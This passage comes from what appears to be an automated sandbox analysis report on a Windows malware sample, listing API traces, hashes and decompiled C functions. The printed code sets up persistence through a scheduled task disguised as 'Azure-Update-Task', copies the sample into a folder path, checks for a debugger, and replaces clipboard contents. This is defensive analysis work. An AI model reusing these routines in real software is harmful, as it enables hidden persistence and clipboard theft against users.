                                                                                                                                                                                            • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,GlobalUnlock), ref: 004010E6
                                                                                                                                                                                            • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,LocalAlloc), ref: 004010F7
                                                                                                                                                                                            • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,LocalFree), ref: 00401108
                                                                                                                                                                                            • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,lstrlenW), ref: 00401119
                                                                                                                                                                                            • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,StrChrW), ref: 0040112D
                                                                                                                                                                                            • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,StrStrW), ref: 0040113E
                                                                                                                                                                                            • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,StrStrIW), ref: 0040114F
                                                                                                                                                                                            • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,StrToIntExW), ref: 0040115B
                                                                                                                                                                                            • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,PathIsDirectoryW), ref: 00401167
                                                                                                                                                                                            • Part of subcall function 00401000: GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 00401178
                                                                                                                                                                                            • Part of subcall function 00401000: GetProcAddress.KERNEL32(?,HeapFree), ref: 00401187
                                                                                                                                                                                          • CreateMutexW.KERNELBASE(00000000,00000000,0N1Y/53R10U5/BU51N355), ref: 00401B8E
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401B94
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00401BA3
                                                                                                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 00401BC4
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00401BD6
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,?,?), ref: 00401C3A
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 00401C99
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00401CB4
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 00401CBD
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00401CD0
                                                                                                                                                                                          • Sleep.KERNEL32(000000E1), ref: 00401CDB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$Local$lstrlen$AllocFree$CreateErrorExitLastMutexProcessSleep
                                                                                                                                                                                          • String ID: 0N1Y/53R10U5/BU51N355
                                                                                                                                                                                          • API String ID: 3526352376-679787619
                                                                                                                                                                                          • Opcode ID: abfc3147e3cb7d637de4c45283e930422affb3ed23b42ad849e5f8596596f60e
                                                                                                                                                                                          • Instruction ID: 3f012f2a931f3eda7aefcabd98cb6df1364c243eae3826966493d824e6423c12
                                                                                                                                                                                          • Opcode Fuzzy Hash: abfc3147e3cb7d637de4c45283e930422affb3ed23b42ad849e5f8596596f60e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7341B4749402159BDB11AFA5D984A7EBBB5BF88301F10007AE642F32F0DB38DD41DB58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401339, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 82processmemorysynchronizationCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00401339(void* __ecx, void* __eflags) {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				int _t28;
				int _t49;
				void* _t50;
				void* _t51;

				_t49 = 0x44;
				_t51 = __ecx;
				memset( &_v92, 0, _t49);
				_v92.cb = _t49;
				memset( &_v24, 0, 0x10);
				_v8 = LocalAlloc(0x40, 0x308);
				E00401D7C( &_v8, L"/C /create /F /sc minute /mo 1 /tn \""); // executed
				E00401D7C( &_v8, L"Azure-Update-Task");
				E00401D7C( &_v8, L"\" /tr \"");
				E00401D7C( &_v8, _t51);
				E00401D7C( &_v8, "\"");
				_t50 = _v8;
				_t28 = CreateProcessW(L"C:\\Windows\\System32\\schtasks.exe", _t50, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24); // executed
				if(_t28 != 0) {
					WaitForSingleObject(_v24.hProcess, 0xffffffff);
					CloseHandle(_v24);
					CloseHandle(_v24.hThread);
					if(_t50 != 0) {
						LocalFree(_t50);
					}
					return 1;
				}
				if(_t50 != 0) {
					LocalFree(_t50);
				}
				return 0;
			}










                                                                                                                                                                                          0x00401344
                                                                                                                                                                                          0x0040134d
                                                                                                                                                                                          0x0040134f
                                                                                                                                                                                          0x0040135a
                                                                                                                                                                                          0x0040135f
                                                                                                                                                                                          0x0040137a
                                                                                                                                                                                          0x00401380
                                                                                                                                                                                          0x0040138d
                                                                                                                                                                                          0x0040139a
                                                                                                                                                                                          0x004013a4
                                                                                                                                                                                          0x004013b1
                                                                                                                                                                                          0x004013b6
                                                                                                                                                                                          0x004013d1
                                                                                                                                                                                          0x004013d9
                                                                                                                                                                                          0x004013ef
                                                                                                                                                                                          0x004013fe
                                                                                                                                                                                          0x00401403
                                                                                                                                                                                          0x00401407
                                                                                                                                                                                          0x0040140a
                                                                                                                                                                                          0x0040140a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401412
                                                                                                                                                                                          0x004013dd
                                                                                                                                                                                          0x004013e0
                                                                                                                                                                                          0x004013e0
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.NTDLL ref: 0040134F
                                                                                                                                                                                          • memset.NTDLL ref: 0040135F
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000308), ref: 0040136F
                                                                                                                                                                                            • Part of subcall function 00401D7C: lstrlenW.KERNEL32(?,00000044,?,00000000,?,?,?,00401385), ref: 00401D92
                                                                                                                                                                                            • Part of subcall function 00401D7C: lstrlenW.KERNEL32(/C /create /F /sc minute /mo 1 /tn ",00000044,?,00000000,?,?,?,00401385), ref: 00401D9F
                                                                                                                                                                                            • Part of subcall function 00401D7C: LocalAlloc.KERNEL32(00000040,00000001,?,00401385), ref: 00401DB0
                                                                                                                                                                                            • Part of subcall function 00401D7C: GlobalFree.KERNEL32 ref: 00401DD1
                                                                                                                                                                                          • CreateProcessW.KERNELBASE ref: 004013D1
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 004013E0
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004013EF
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004013FE
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00401403
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 0040140A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • " /tr ", xrefs: 00401392
                                                                                                                                                                                          • Azure-Update-Task, xrefs: 00401385
                                                                                                                                                                                          • /C /create /F /sc minute /mo 1 /tn ", xrefs: 00401375
                                                                                                                                                                                          • C:\Windows\System32\schtasks.exe, xrefs: 004013CC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Local$Free$AllocCloseHandlelstrlenmemset$CreateGlobalObjectProcessSingleWait
                                                                                                                                                                                          • String ID: " /tr "$/C /create /F /sc minute /mo 1 /tn "$Azure-Update-Task$C:\Windows\System32\schtasks.exe
                                                                                                                                                                                          • API String ID: 2873265511-3368035720
                                                                                                                                                                                          • Opcode ID: 1ec7269c68737af2b38322868ed3762ec80b395895a701cf05524ec3fdf00e48
                                                                                                                                                                                          • Instruction ID: 866b7d2ddefd7e492dcfc638dded416843d2f37144fb2dfd60a26f3a44d98789
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ec7269c68737af2b38322868ed3762ec80b395895a701cf05524ec3fdf00e48
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C2192B1900109AFD710EFA5DD85EAF7B7CEF8475AF200036B601B61E4DB745E008A68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C6003C, Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02C6024D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                          • String ID: cess$kernel32.dll
                                                                                                                                                                                          • API String ID: 4275171209-1230238691
                                                                                                                                                                                          • Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                                                                                                                                                          • Instruction ID: 751fb6d7ad82fa6ada8a52c97ba949136f1f036daebde48c75e9f8c067353c80
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                                                                                                                                                          • Instruction Fuzzy Hash: 32525974A01229DFDB64CF68C985BACBBB1BF09304F1480D9E94DAB351DB30AA85DF15
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401D7C, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 51stringmemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                          			E00401D7C(WCHAR** __ecx, WCHAR* __edx) {
				signed int _v8;
				WCHAR* _v12;
				signed int _t10;
				WCHAR* _t20;
				void* _t21;
				int _t30;
				signed int _t31;
				void** _t34;

				_push(__ecx);
				_push(__ecx);
				_t34 = __ecx;
				_t20 = __edx;
				_v12 = __edx;
				if( *__ecx == 0) {
					_t30 = 0;
				} else {
					_t30 = lstrlenW( *__ecx);
				}
				_t10 = lstrlenW(_t20) + 1 + _t30;
				_v8 = _t10;
				_t21 = LocalAlloc(0x40, _t10 + _t10);
				_t31 = _v8;
				if(_t30 != 0) {
					E00401418(_t21, _t31,  *_t34);
				}
				if( *_t34 != 0) {
					GlobalFree( *_t34); // executed
				}
				E00401CE6(_t21, _t31, _v12);
				 *_t34 = _t21;
				 *((short*)(_t21 + _t31 * 2 - 2)) = 0;
				return 1;
			}











                                                                                                                                                                                          0x00401d7f
                                                                                                                                                                                          0x00401d80
                                                                                                                                                                                          0x00401d83
                                                                                                                                                                                          0x00401d85
                                                                                                                                                                                          0x00401d88
                                                                                                                                                                                          0x00401d8e
                                                                                                                                                                                          0x00401d9c
                                                                                                                                                                                          0x00401d90
                                                                                                                                                                                          0x00401d98
                                                                                                                                                                                          0x00401d98
                                                                                                                                                                                          0x00401da6
                                                                                                                                                                                          0x00401da8
                                                                                                                                                                                          0x00401db8
                                                                                                                                                                                          0x00401dba
                                                                                                                                                                                          0x00401dbd
                                                                                                                                                                                          0x00401dc5
                                                                                                                                                                                          0x00401dc5
                                                                                                                                                                                          0x00401dcd
                                                                                                                                                                                          0x00401dd1
                                                                                                                                                                                          0x00401dd1
                                                                                                                                                                                          0x00401dde
                                                                                                                                                                                          0x00401de5
                                                                                                                                                                                          0x00401de7
                                                                                                                                                                                          0x00401df1

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000044,?,00000000,?,?,?,00401385), ref: 00401D92
                                                                                                                                                                                          • lstrlenW.KERNEL32(/C /create /F /sc minute /mo 1 /tn ",00000044,?,00000000,?,?,?,00401385), ref: 00401D9F
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000001,?,00401385), ref: 00401DB0
                                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 00401DD1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • /C /create /F /sc minute /mo 1 /tn ", xrefs: 00401D9E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$AllocFreeGlobalLocal
                                                                                                                                                                                          • String ID: /C /create /F /sc minute /mo 1 /tn "
                                                                                                                                                                                          • API String ID: 3873415381-4285889591
                                                                                                                                                                                          • Opcode ID: 587df80eb51c2a01ab4461f8c379014ae1cc834c61983a62516beef9a75456fa
                                                                                                                                                                                          • Instruction ID: e4eeb56db1f359d191c916dc7992aa8b087273442978b1b4ad4c4756f7a4d6b6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 587df80eb51c2a01ab4461f8c379014ae1cc834c61983a62516beef9a75456fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D017175610205AFD7105FA9DC45A6ABAFAEFD4311F24443EA282F32B1DAB89C418664
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00419350, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00421E1C), ref: 0041937E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(02B77404,00435578), ref: 00419430
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(02B6F54C,02B77B00,00000040,?), ref: 00419450
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                          • API String ID: 2099061454-2766056989
                                                                                                                                                                                          • Opcode ID: 2ad12357a522cef60bd112afa0d5295fed7f52de05462541a459c876ddfa2d6e
                                                                                                                                                                                          • Instruction ID: d9ae2ebe879e639c4e3b926cec9c7d8b58d644c20bdcb63d04e190339fc0cd6f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ad12357a522cef60bd112afa0d5295fed7f52de05462541a459c876ddfa2d6e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 32216D21908AC0FED302CB7CFD5862A3FA74326244F0866B9D495472BFC6792118DB7E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C60DF8, Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000400,?,?,02C60223,?,?), ref: 02C60E02
                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000000,?,?,02C60223,?,?), ref: 02C60E07
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                          • Instruction ID: c24a7c79a3cdb0739b6b7fca210df49940037ef47a0b32523d1896d70317d918
                                                                                                                                                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                          • Instruction Fuzzy Hash: E2D0123114512C77D7002AD4DC0DBDD7B1C9F05B6AF008051FB0DE9181C7709A4046E5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409300, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 00409307
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2118026453-0
                                                                                                                                                                                          • Opcode ID: 290b8e1962c91982bf8375fc283ed684609ad00eaa07a203bd0aa917c7852488
                                                                                                                                                                                          • Instruction ID: 555c3cc75909235c463f038e69d95b8845f3c7525ef100fa5f3fbbce69837220
                                                                                                                                                                                          • Opcode Fuzzy Hash: 290b8e1962c91982bf8375fc283ed684609ad00eaa07a203bd0aa917c7852488
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BA01132088388A3C2002282A80AB823E0CC3C8A32F000020F22C020808AA2A80080AA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C60920, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02C60929
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProcessTerminate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 560597551-0
                                                                                                                                                                                          • Opcode ID: a112e37ccacacf0a755694005ce2d4fb1995a77917544b0a2f7eebedcae688b6
                                                                                                                                                                                          • Instruction ID: c8e6868aba343cae360140c5b3bd850b99d9938bbc1dc198fca96fadd5918fc5
                                                                                                                                                                                          • Opcode Fuzzy Hash: a112e37ccacacf0a755694005ce2d4fb1995a77917544b0a2f7eebedcae688b6
                                                                                                                                                                                          • Instruction Fuzzy Hash: B69002B024415021D820259C0C01B0500052751634F304710B130BA6D4D84096000115
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00419330, Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000000,02B77B00), ref: 0041933B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocGlobal
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3761449716-0
                                                                                                                                                                                          • Opcode ID: 1aab901deb91e4522476e3ed4ad7919861da94ef2ec11d9425b62cd5ec64c2eb
                                                                                                                                                                                          • Instruction ID: 8e3655ca648fa178d482b9bc68af4478a5255a32ede4fed7c8bcd03305e8ef34
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1aab901deb91e4522476e3ed4ad7919861da94ef2ec11d9425b62cd5ec64c2eb
                                                                                                                                                                                          • Instruction Fuzzy Hash: CCC04C759953085FD2109B95B859B2177ACE348641F004415E50983651D66068148E55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 004199E0, Relevance: 16.6, APIs: 11, Instructions: 90memorypipeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00419A0C
                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(00421E80,00421E70,00000000,00421E30), ref: 00419A2C
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00419A32
                                                                                                                                                                                          • GetNumberFormatA.KERNEL32(00000000,00000000,00421E90,00000000,?,00000000), ref: 00419A58
                                                                                                                                                                                          • GetCPInfoExW.KERNEL32(00000000,00000000,?), ref: 00419A69
                                                                                                                                                                                          • GetCommandLineW.KERNEL32 ref: 00419A6F
                                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 00419A77
                                                                                                                                                                                          • SetFileShortNameA.KERNEL32(00000000,00000000), ref: 00419A81
                                                                                                                                                                                          • CreateNamedPipeA.KERNEL32(00421EB0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00419AF1
                                                                                                                                                                                          • GetBinaryType.KERNEL32(00421ED0,?), ref: 00419B49
                                                                                                                                                                                          • HeapDestroy.KERNEL32(00000000), ref: 00419B51
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorInfoLast$BinaryCommandCreateDestroyFileFormatHeapLineNameNamedNumberPipePrivateProfileShortStartupType
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3242046743-0
                                                                                                                                                                                          • Opcode ID: 7c5cb30a4695b971b029f1528554ae09b201add16f0ae535992b7a0b0ca3f754
                                                                                                                                                                                          • Instruction ID: 01657f5c00476ba7faca39b10de3ba90de21ef6b07a221bae3b0a22fecd08fed
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c5cb30a4695b971b029f1528554ae09b201add16f0ae535992b7a0b0ca3f754
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A31B070A44214DFE720DF90EC29BE97B71FB48349F1082AAF10566190CBB92D98DF1E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02C614C2, Relevance: 13.6, APIs: 9, Instructions: 58fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02C614DB
                                                                                                                                                                                          • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C614ED
                                                                                                                                                                                          • PathAppendW.SHLWAPI(?,0040391C), ref: 02C61503
                                                                                                                                                                                          • PathIsDirectoryW.SHLWAPI(?), ref: 02C61510
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 02C61522
                                                                                                                                                                                          • PathAppendW.SHLWAPI(?,00403944), ref: 02C61534
                                                                                                                                                                                          • StrStrW.SHLWAPI(?,?), ref: 02C61548
                                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 02C6156F
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 02C61582
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Path$AppendDirectoryFile$CopyCreateExitFolderModuleNameProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3994694214-0
                                                                                                                                                                                          • Opcode ID: ef3b43e0bf257aa2203ea887fd2ae442e103df6aa474e8697a45c816f97d1015
                                                                                                                                                                                          • Instruction ID: 3de5a8549df4787d0cf27699b133264310d9f886743f6be2798c4c73239cdb56
                                                                                                                                                                                          • Opcode Fuzzy Hash: ef3b43e0bf257aa2203ea887fd2ae442e103df6aa474e8697a45c816f97d1015
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A110DB2500229ABCB60DFA0DD4CEDB7B6CAB45316F0401A1A36AF2061EB7497C49F64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401AD7, Relevance: 13.5, APIs: 9, Instructions: 36clipboardmemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00401AD7(void* __ecx, signed int __edx) {
				void* _t3;
				signed int _t6;
				void* _t13;
				void* _t16;
				int _t17;

				_t17 = 2 + __edx * 2;
				_t16 = __ecx;
				_t3 = GlobalAlloc(2, _t17);
				_t13 = _t3;
				GlobalFix(_t13);
				memcpy(_t3, _t16, _t17);
				GlobalUnWire(_t13);
				_t6 = OpenClipboard(0);
				if(_t6 == 0) {
					return _t6 | 0xffffffff;
				}
				EmptyClipboard();
				SetClipboardData(0xd, _t13);
				CloseClipboard();
				GlobalFree(_t13);
				return 0;
			}








                                                                                                                                                                                          0x00401ada
                                                                                                                                                                                          0x00401ae1
                                                                                                                                                                                          0x00401ae6
                                                                                                                                                                                          0x00401aed
                                                                                                                                                                                          0x00401af1
                                                                                                                                                                                          0x00401af8
                                                                                                                                                                                          0x00401b02
                                                                                                                                                                                          0x00401b0a
                                                                                                                                                                                          0x00401b12
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401b34
                                                                                                                                                                                          0x00401b14
                                                                                                                                                                                          0x00401b1d
                                                                                                                                                                                          0x00401b23
                                                                                                                                                                                          0x00401b2a
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,00000000,00000000,00401CCD), ref: 00401AE6
                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 00401AF1
                                                                                                                                                                                          • memcpy.NTDLL(00000000), ref: 00401AF8
                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 00401B02
                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00401B0A
                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00401B14
                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00401B1D
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00401B23
                                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 00401B2A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeOpenWirememcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2518647738-0
                                                                                                                                                                                          • Opcode ID: 6e8f05b13c52bda2192f9b5ea7998a520b2c1201303ff2b2893ffa802e95b434
                                                                                                                                                                                          • Instruction ID: 99cc7953c36b9163d40fd3eda38f0c3b9334772042750b8267dfc38c461d4ec0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e8f05b13c52bda2192f9b5ea7998a520b2c1201303ff2b2893ffa802e95b434
                                                                                                                                                                                          • Instruction Fuzzy Hash: 55F0FEF6601110ABE2002BB4BE4DB5B3F6CEBC9756F010535B306F51A1DA7498148B79
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040BF70, Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0041431D
                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00414334
                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(00420BEC), ref: 0041433F
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0041435D
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00414364
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.435969792.0000000000406000.00000020.00020000.sdmp, Offset: 00406000, based on PE: false
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                          • Opcode ID: b5ed279ea4a4dab34c54404148aadcebec64625d945cb77831002f59ee24622b
                                                                                                                                                                                          • Instruction ID: 3b85324b25fa6e122bcd8d2fd14b9e1c915bf2a8df4e9c43ea8155ef528145f4
                                                                                                                                                                                          • Opcode Fuzzy Hash: b5ed279ea4a4dab34c54404148aadcebec64625d945cb77831002f59ee24622b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 902124B8910B089BD300EF65FC486897BB4FB58390F81607AEC1987361E3B40681CF8D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401B3B, Relevance: 7.5, APIs: 5, Instructions: 24clipboardCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00401B3B() {
				void* _t3;
				void* _t7;
